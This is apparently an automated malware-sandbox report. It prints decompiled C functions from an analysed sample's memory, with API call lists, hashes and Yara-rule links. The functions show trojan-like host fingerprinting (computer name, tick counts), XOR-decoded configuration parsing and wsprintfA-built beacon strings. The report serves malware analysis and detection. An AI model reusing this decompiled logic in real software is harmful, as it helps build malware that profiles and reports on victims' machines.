                                                          • API String ID: 986138563-0
                                                          • Opcode ID: 3b9b82c98663d24a7d067ea39d9824aab4c66ceecf229add14bd172c36075781
                                                          • Instruction ID: d6880ea2081496a8c806854f5c293357ecdc18a4113db090ec7a6dfd0607473f
                                                          • Opcode Fuzzy Hash: 3b9b82c98663d24a7d067ea39d9824aab4c66ceecf229add14bd172c36075781
                                                          • Instruction Fuzzy Hash: 03317C71500109AFCF21EF95C888CEBBB7AFFC97407104A99F9159B211D271ED52CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04476207, Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(0447A513), ref: 04476220
                                                            • Part of subcall function 0447219B: SysFreeString.OLEAUT32(?), ref: 0447227A
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04476261
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          • Opcode ID: 75f184b56bc4849268c5f90545dea41cb7c1827d86b8a68ef98f38fb1f30e852
                                                          • Instruction ID: efa3ccc70fe06d62a8e319a6eb0a0e3f922a0fa05497e32e74cae5e683d31c49
                                                          • Opcode Fuzzy Hash: 75f184b56bc4849268c5f90545dea41cb7c1827d86b8a68ef98f38fb1f30e852
                                                          • Instruction Fuzzy Hash: 9E014F7551014ABFDF419FA9D804DDBBBB9FF48614B114166FA08E6120D6309D168BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 044758DB, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E044758DB(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E0447A71F(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E0447A734(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                          0x044758e0
                                                          0x044758eb
                                                          0x044758ed
                                                          0x044758f3
                                                          0x044758f5
                                                          0x044758fa
                                                          0x04475903
                                                          0x04475907
                                                          0x04475910
                                                          0x04475914
                                                          0x04475923
                                                          0x04475916
                                                          0x04475917
                                                          0x0447591c
                                                          0x0447591c
                                                          0x04475914
                                                          0x04475907
                                                          0x0447592c

                                                          APIs
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,04471FA0,74B5F710,00000000,?,?,04471FA0), ref: 044758F3
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,04471FA0,04471FA1,?,?,04471FA0), ref: 04475910
                                                            • Part of subcall function 0447A734: HeapFree.KERNEL32(00000000,00000000,04475637,00000000,?,?,00000000), ref: 0447A740
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ComputerHeapName$AllocateFree
                                                          • String ID:
                                                          • API String ID: 187446995-0
                                                          • Opcode ID: f6d34328039f25805a7e4c506acd48e9a8cb48a9ea83483e44174cddf8230906
                                                          • Instruction ID: 64e5bd461d78fa0a4331f7ef0799df480edf27c26f21f72f753b593f0a5ffced
                                                          • Opcode Fuzzy Hash: f6d34328039f25805a7e4c506acd48e9a8cb48a9ea83483e44174cddf8230906
                                                          • Instruction Fuzzy Hash: 9CF0B476600145BAEF11D79A9D00EEF37FCDBC4610F21006AA500E7201EA70EE038770
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04474ECA, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x447d23c) == 0) {
						E04471B42();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x447d23c) == 1) {
						_t10 = E044712E5(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                          0x04474ed1
                                                          0x04474ed2
                                                          0x04474ed5
                                                          0x04474f07
                                                          0x04474f09
                                                          0x04474f09
                                                          0x04474ed7
                                                          0x04474ed8
                                                          0x04474eed
                                                          0x04474ef4
                                                          0x04474ef6
                                                          0x04474ef6
                                                          0x04474ef4
                                                          0x04474ed8
                                                          0x04474f11

                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(0447D23C), ref: 04474EDF
                                                            • Part of subcall function 044712E5: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04474EF2,?), ref: 044712F8
                                                          • InterlockedDecrement.KERNEL32(0447D23C), ref: 04474EFF
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                          • String ID:
                                                          • API String ID: 3834848776-0
                                                          • Opcode ID: 8f7114fffafbdf8ffd3d4ebe1a86471bbcab092d5d4c04e6549de1f198d8b6e1
                                                          • Instruction ID: 4792a83b4629b0a243202ff3c41c89a448ba36d5d6d4117416c3b7c986f07946
                                                          • Opcode Fuzzy Hash: 8f7114fffafbdf8ffd3d4ebe1a86471bbcab092d5d4c04e6549de1f198d8b6e1
                                                          • Instruction Fuzzy Hash: EAE04F2121813953FF211EB49948BFBE652AF80B84F114817E781D1230D610F84396E6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04471AE2, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E04471AE2(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                                                          0x04471ae2
                                                          0x04471aef
                                                          0x04471af0
                                                          0x04471af1
                                                          0x04471af8
                                                          0x04471b26
                                                          0x04471b27
                                                          0x04471b2a
                                                          0x04471b30
                                                          0x00000000
                                                          0x00000000
                                                          0x04471b0f
                                                          0x04471b19
                                                          0x04471b20
                                                          0x00000000
                                                          0x04471b11
                                                          0x04471b14
                                                          0x04471b34
                                                          0x04471b16
                                                          0x04471b16
                                                          0x00000000
                                                          0x04471b16
                                                          0x04471b14
                                                          0x04471b3b
                                                          0x04471b41
                                                          0x04471b41
                                                          0x00000000

                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 04471B2A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: a5a4a203cf6e0fed8b116447760974c8aa04d7a28d3d3337b90724c31d68ea0e
                                                          • Instruction ID: 18ec90bd070912c7fc001eff9fc848e6d8f9d2878e8dad3f7a565f1ce3ea9647
                                                          • Opcode Fuzzy Hash: a5a4a203cf6e0fed8b116447760974c8aa04d7a28d3d3337b90724c31d68ea0e
                                                          • Instruction Fuzzy Hash: DEF0C975D01218EBDF10DB94C588AEEB7B8EF04305F1444AAE50267240E7746B46DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04475D7D, Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04475D7D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E04476002(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E04476207(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                                                          0x04475d85
                                                          0x04475d9f
                                                          0x00000000
                                                          0x04475dbb
                                                          0x04475d96
                                                          0x04475d9d
                                                          0x00000000
                                                          0x00000000
                                                          0x04475dc2

                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,04478708,3D0447C0,80000002,04473741,0447A513,74666F53,4D4C4B48,0447A513,?,3D0447C0,80000002,04473741,?), ref: 04475DA2
                                                            • Part of subcall function 04476207: SysAllocString.OLEAUT32(0447A513), ref: 04476220
                                                            • Part of subcall function 04476207: SysFreeString.OLEAUT32(00000000), ref: 04476261
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFreelstrlen
                                                          • String ID:
                                                          • API String ID: 3808004451-0
                                                          • Opcode ID: 12d8895b1e129a05071ae53e5d0e52eff2351a38f62d241a66a7beed64509dfd
                                                          • Instruction ID: d40fe357a9b87e3bdfed211ff9293b2f120809e70b06a85f198385af4b681a28
                                                          • Opcode Fuzzy Hash: 12d8895b1e129a05071ae53e5d0e52eff2351a38f62d241a66a7beed64509dfd
                                                          • Instruction Fuzzy Hash: C5F0923200020EBFDF129F91DC05EEA3F6AEB08354F048015FA1458161D732E5B2EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 0447888E, Relevance: 10.7, APIs: 7, Instructions: 237memoryCOMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 95%
                                                          			E0447888E(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				signed int _t58;
				intOrPtr _t61;
				signed int _t62;
				signed int _t67;
				void* _t69;
				void* _t70;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				signed int _t84;
				signed int _t88;
				signed int _t92;
				void* _t97;
				intOrPtr _t114;

				_t98 = __ecx;
				_t26 =  *0x447d2a4; // 0x63699bc3
				if(E04477145( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x90) {
					 *0x447d2d8 = _v8;
				}
				_t31 =  *0x447d2a4; // 0x63699bc3
				if(E04477145( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L62:
					return _v12;
				}
				_t37 =  *0x447d2a4; // 0x63699bc3
				if(E04477145( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L60:
					HeapFree( *0x447d238, 0, _v16);
					goto L62;
				} else {
					_t97 = _v12;
					if(_t97 == 0) {
						_t43 = 0;
					} else {
						_t92 =  *0x447d2a4; // 0x63699bc3
						_t43 = E04476B2E(_t98, _t97, _t92 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0x447d240 = _v8;
						}
					}
					if(_t97 == 0) {
						_t44 = 0;
					} else {
						_t88 =  *0x447d2a4; // 0x63699bc3
						_t44 = E04476B2E(_t98, _t97, _t88 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0x447d244 = _v8;
						}
					}
					if(_t97 == 0) {
						_t45 = 0;
					} else {
						_t84 =  *0x447d2a4; // 0x63699bc3
						_t45 = E04476B2E(_t98, _t97, _t84 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x447d248 = _v8;
						}
					}
					if(_t97 == 0) {
						_t46 = 0;
					} else {
						_t80 =  *0x447d2a4; // 0x63699bc3
						_t46 = E04476B2E(_t98, _t97, _t80 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x447d004 = _v8;
						}
					}
					if(_t97 == 0) {
						_t47 = 0;
					} else {
						_t76 =  *0x447d2a4; // 0x63699bc3
						_t47 = E04476B2E(_t98, _t97, _t76 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x447d02c = _v8;
						}
					}
					if(_t97 == 0) {
						_t48 = 0;
					} else {
						_t72 =  *0x447d2a4; // 0x63699bc3
						_t48 = E04476B2E(_t98, _t97, _t72 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t69 = 0x10;
						_t70 = E044756FA(_t69);
						if(_t70 != 0) {
							_push(_t70);
							E04476702();
						}
					}
					if(_t97 == 0) {
						_t49 = 0;
					} else {
						_t67 =  *0x447d2a4; // 0x63699bc3
						_t49 = E04476B2E(_t98, _t97, _t67 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E044756FA(0, _t49) != 0) {
						_t114 =  *0x447d32c; // 0x50195b0
						E044723F4(_t114 + 4, _t65);
					}
					if(_t97 == 0) {
						_t50 = 0;
					} else {
						_t62 =  *0x447d2a4; // 0x63699bc3
						_t50 = E04476B2E(_t98, _t97, _t62 ^ 0x372ab5b7);
					}
					if(_t50 == 0) {
						L52:
						_t51 =  *0x447d2a8; // 0xb9a5a8
						_t20 = _t51 + 0x447e252; // 0x616d692f
						 *0x447d2d4 = _t20;
						goto L53;
					} else {
						_t61 = E044756FA(0, _t50);
						 *0x447d2d4 = _t61;
						if(_t61 != 0) {
							L53:
							if(_t97 == 0) {
								_t53 = 0;
							} else {
								_t58 =  *0x447d2a4; // 0x63699bc3
								_t53 = E04476B2E(_t98, _t97, _t58 ^ 0xd8dc5cde);
							}
							if(_t53 == 0) {
								_t54 =  *0x447d2a8; // 0xb9a5a8
								_t21 = _t54 + 0x447e791; // 0x6976612e
								_t55 = _t21;
							} else {
								_t55 = E044756FA(0, _t53);
							}
							 *0x447d340 = _t55;
							HeapFree( *0x447d238, 0, _t97);
							_v12 = 0;
							goto L60;
						}
						goto L52;
					}
				}
			}




































                                                          0x0447888e
                                                          0x04478891
                                                          0x044788b1
                                                          0x044788bf
                                                          0x044788bf
                                                          0x044788c4
                                                          0x044788de
                                                          0x04478b0d
                                                          0x04478b14
                                                          0x04478b1b
                                                          0x04478b1b
                                                          0x044788e4
                                                          0x04478900
                                                          0x04478afb
                                                          0x04478b05
                                                          0x00000000
                                                          0x04478906
                                                          0x04478906
                                                          0x0447890b
                                                          0x04478921
                                                          0x0447890d
                                                          0x0447890d
                                                          0x0447891a
                                                          0x0447891a
                                                          0x0447892b
                                                          0x0447892d
                                                          0x04478937
                                                          0x0447893c
                                                          0x0447893c
                                                          0x04478937
                                                          0x04478943
                                                          0x04478959
                                                          0x04478945
                                                          0x04478945
                                                          0x04478952
                                                          0x04478952
                                                          0x0447895d
                                                          0x0447895f
                                                          0x04478969
                                                          0x0447896e
                                                          0x0447896e
                                                          0x04478969
                                                          0x04478975
                                                          0x0447898b
                                                          0x04478977
                                                          0x04478977
                                                          0x04478984
                                                          0x04478984
                                                          0x0447898f
                                                          0x04478991
                                                          0x0447899b
                                                          0x044789a0
                                                          0x044789a0
                                                          0x0447899b
                                                          0x044789a7
                                                          0x044789bd
                                                          0x044789a9
                                                          0x044789a9
                                                          0x044789b6
                                                          0x044789b6
                                                          0x044789c1
                                                          0x044789c3
                                                          0x044789cd
                                                          0x044789d2
                                                          0x044789d2
                                                          0x044789cd
                                                          0x044789d9
                                                          0x044789ef
                                                          0x044789db
                                                          0x044789db
                                                          0x044789e8
                                                          0x044789e8
                                                          0x044789f3
                                                          0x044789f5
                                                          0x044789ff
                                                          0x04478a04
                                                          0x04478a04
                                                          0x044789ff
                                                          0x04478a0b
                                                          0x04478a21
                                                          0x04478a0d
                                                          0x04478a0d
                                                          0x04478a1a
                                                          0x04478a1a
                                                          0x04478a25
                                                          0x04478a27
                                                          0x04478a2a
                                                          0x04478a2b
                                                          0x04478a32
                                                          0x04478a34
                                                          0x04478a35
                                                          0x04478a35
                                                          0x04478a32
                                                          0x04478a3c
                                                          0x04478a52
                                                          0x04478a3e
                                                          0x04478a3e
                                                          0x04478a4b
                                                          0x04478a4b
                                                          0x04478a56
                                                          0x04478a64
                                                          0x04478a6e
                                                          0x04478a6e
                                                          0x04478a75
                                                          0x04478a8b
                                                          0x04478a77
                                                          0x04478a77
                                                          0x04478a84
                                                          0x04478a84
                                                          0x04478a8f
                                                          0x04478aa2
                                                          0x04478aa2
                                                          0x04478aa7
                                                          0x04478aad
                                                          0x00000000
                                                          0x04478a91
                                                          0x04478a94
                                                          0x04478a99
                                                          0x04478aa0
                                                          0x04478ab2
                                                          0x04478ab4
                                                          0x04478aca
                                                          0x04478ab6
                                                          0x04478ab6
                                                          0x04478ac3
                                                          0x04478ac3
                                                          0x04478ace
                                                          0x04478ada
                                                          0x04478adf
                                                          0x04478adf
                                                          0x04478ad0
                                                          0x04478ad3
                                                          0x04478ad3
                                                          0x04478aed
                                                          0x04478af2
                                                          0x04478af8
                                                          0x00000000
                                                          0x04478af8
                                                          0x00000000
                                                          0x04478aa0
                                                          0x04478a8f

                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04475D25,?,63699BC3,?,04475D25,63699BC3,?,04475D25,63699BC3,00000005,0447D00C,00000008), ref: 04478933
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04475D25,?,63699BC3,?,04475D25,63699BC3,?,04475D25,63699BC3,00000005,0447D00C,00000008), ref: 04478965
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04475D25,?,63699BC3,?,04475D25,63699BC3,?,04475D25,63699BC3,00000005,0447D00C,00000008), ref: 04478997
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04475D25,?,63699BC3,?,04475D25,63699BC3,?,04475D25,63699BC3,00000005,0447D00C,00000008), ref: 044789C9
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04475D25,?,63699BC3,?,04475D25,63699BC3,?,04475D25,63699BC3,00000005,0447D00C,00000008), ref: 044789FB
                                                          • HeapFree.KERNEL32(00000000,04475D25,04475D25,?,63699BC3,?,04475D25,63699BC3,?,04475D25,63699BC3,00000005,0447D00C,00000008,?,04475D25), ref: 04478AF2
                                                          • HeapFree.KERNEL32(00000000,?,04475D25,?,63699BC3,?,04475D25,63699BC3,?,04475D25,63699BC3,00000005,0447D00C,00000008,?,04475D25), ref: 04478B05
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: b4270b6d60b26fd1aa03c352b100fca401c3531b76170047b356e58bd198a1ed
                                                          • Instruction ID: 3566ef1d35b956420e0c793acae5d1db984ce0246df6674f833a133d448ff492
                                                          • Opcode Fuzzy Hash: b4270b6d60b26fd1aa03c352b100fca401c3531b76170047b356e58bd198a1ed
                                                          • Instruction Fuzzy Hash: 26714DB1E10115AFEF20FBB999889DBB7EDEF883407240927A506D7205EA34F9478761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04471F13, Relevance: 34.7, APIs: 23, Instructions: 201memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 66%
                                                          			E04471F13(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x447d018; // 0xf1c1aee9
				asm("bswap eax");
				_t27 =  *0x447d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x447d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 = E0447D00C; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0x447d2a8; // 0xb9a5a8
				_t3 = _t30 + 0x447e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d15e, _t29, _t28, _t27, _t26,  *0x447d02c,  *0x447d004, _t25);
				_t33 = E044756CD();
				_t34 =  *0x447d2a8; // 0xb9a5a8
				_t4 = _t34 + 0x447e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E044758DB(_t91);
				if(_t96 != 0) {
					_t83 =  *0x447d2a8; // 0xb9a5a8
					_t6 = _t83 + 0x447e8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x447d238, 0, _t96);
				}
				_t97 = E0447A199();
				if(_t97 != 0) {
					_t78 =  *0x447d2a8; // 0xb9a5a8
					_t8 = _t78 + 0x447e8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x447d238, 0, _t97);
				}
				_t98 =  *0x447d32c; // 0x50195b0
				_a32 = E04474622(0x447d00a, _t98 + 4);
				_t42 =  *0x447d2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x447d2a8; // 0xb9a5a8
					_t11 = _t74 + 0x447e8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x447d2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x447d2a8; // 0xb9a5a8
					_t13 = _t71 + 0x447e88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x447d238, 0, 0x800);
					if(_t100 != 0) {
						E0447518F(GetTickCount());
						_t50 =  *0x447d32c; // 0x50195b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x447d32c; // 0x50195b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x447d32c; // 0x50195b0
						_t103 = E04471BB6(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x447c28c);
							_push(_t103);
							_t62 = E0447361A();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E04476777(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E04476761();
								}
								HeapFree( *0x447d238, 0, _v44);
							}
							HeapFree( *0x447d238, 0, _t103);
						}
						HeapFree( *0x447d238, 0, _t100);
					}
					HeapFree( *0x447d238, 0, _a24);
				}
				HeapFree( *0x447d238, 0, _t105);
				return _a12;
			}
















































                                                          0x04471f13
                                                          0x04471f13
                                                          0x04471f13
                                                          0x04471f18
                                                          0x04471f1e
                                                          0x04471f28
                                                          0x04471f2a
                                                          0x04471f2a
                                                          0x04471f37
                                                          0x04471f42
                                                          0x04471f45
                                                          0x04471f50
                                                          0x04471f53
                                                          0x04471f58
                                                          0x04471f5b
                                                          0x04471f60
                                                          0x04471f63
                                                          0x04471f6f
                                                          0x04471f7c
                                                          0x04471f7e
                                                          0x04471f84
                                                          0x04471f89
                                                          0x04471f94
                                                          0x04471f96
                                                          0x04471f99
                                                          0x04471fa0
                                                          0x04471fa4
                                                          0x04471fa6
                                                          0x04471fab
                                                          0x04471fb7
                                                          0x04471fb9
                                                          0x04471fc5
                                                          0x04471fc7
                                                          0x04471fc7
                                                          0x04471fd2
                                                          0x04471fd6
                                                          0x04471fd8
                                                          0x04471fdd
                                                          0x04471fe9
                                                          0x04471feb
                                                          0x04471ff7
                                                          0x04471ff9
                                                          0x04471ff9
                                                          0x04471fff
                                                          0x04472012
                                                          0x04472016
                                                          0x0447201d
                                                          0x04472020
                                                          0x04472025
                                                          0x04472030
                                                          0x04472032
                                                          0x04472035
                                                          0x04472035
                                                          0x04472037
                                                          0x0447203e
                                                          0x04472041
                                                          0x04472046
                                                          0x04472050
                                                          0x04472052
                                                          0x0447205a
                                                          0x04472073
                                                          0x04472077
                                                          0x04472083
                                                          0x04472088
                                                          0x04472091
                                                          0x044720a2
                                                          0x044720a6
                                                          0x044720af
                                                          0x044720b5
                                                          0x044720c2
                                                          0x044720cf
                                                          0x044720d5
                                                          0x044720e1
                                                          0x044720e7
                                                          0x044720e8
                                                          0x044720ed
                                                          0x044720f3
                                                          0x044720f9
                                                          0x04472100
                                                          0x04472107
                                                          0x0447210d
                                                          0x04472114
                                                          0x04472118
                                                          0x04472123
                                                          0x04472128
                                                          0x0447212e
                                                          0x04472137
                                                          0x04472137
                                                          0x04472148
                                                          0x04472148
                                                          0x04472157
                                                          0x04472157
                                                          0x04472166
                                                          0x04472166
                                                          0x04472178
                                                          0x04472178
                                                          0x04472187
                                                          0x04472198

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04471F2A
                                                          • wsprintfA.USER32 ref: 04471F77
